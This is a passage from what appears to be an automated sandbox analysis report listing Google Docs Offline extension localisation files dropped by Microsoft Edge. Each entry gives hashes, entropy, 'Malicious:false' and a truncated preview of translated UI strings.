                                                                                                                                                            Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3235
                                                                                                                                                            Entropy (8bit):3.6081439490236464
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                            MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                            SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                            SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                            SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3122
                                                                                                                                                            Entropy (8bit):3.891443295908904
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                            MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                            SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                            SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                            SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1895
                                                                                                                                                            Entropy (8bit):4.28990403715536
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                            MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                            SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                            SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                            SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1042
                                                                                                                                                            Entropy (8bit):5.3945675025513955
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                            MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                            SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                            SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                            SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2535
                                                                                                                                                            Entropy (8bit):3.8479764584971368
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                            MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                            SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                            SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                            SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1028
                                                                                                                                                            Entropy (8bit):4.797571191712988
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                            MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                            SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                            SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                            SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):994
                                                                                                                                                            Entropy (8bit):4.700308832360794
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                            MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                            SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                            SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                            SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2091
                                                                                                                                                            Entropy (8bit):4.358252286391144
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                            MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                            SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                            SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                            SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2778
                                                                                                                                                            Entropy (8bit):3.595196082412897
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                            MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                            SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                            SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                            SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1719
                                                                                                                                                            Entropy (8bit):4.287702203591075
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                            MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                            SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                            SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                            SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):936
                                                                                                                                                            Entropy (8bit):4.457879437756106
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                            MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                            SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                            SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                            SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3830
                                                                                                                                                            Entropy (8bit):3.5483353063347587
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                            MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                            SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                            SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                            SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1898
                                                                                                                                                            Entropy (8bit):4.187050294267571
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                            MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                            SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                            SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                            SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):914
                                                                                                                                                            Entropy (8bit):4.513485418448461
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                            MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                            SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                            SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                            SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                            Malicious:false
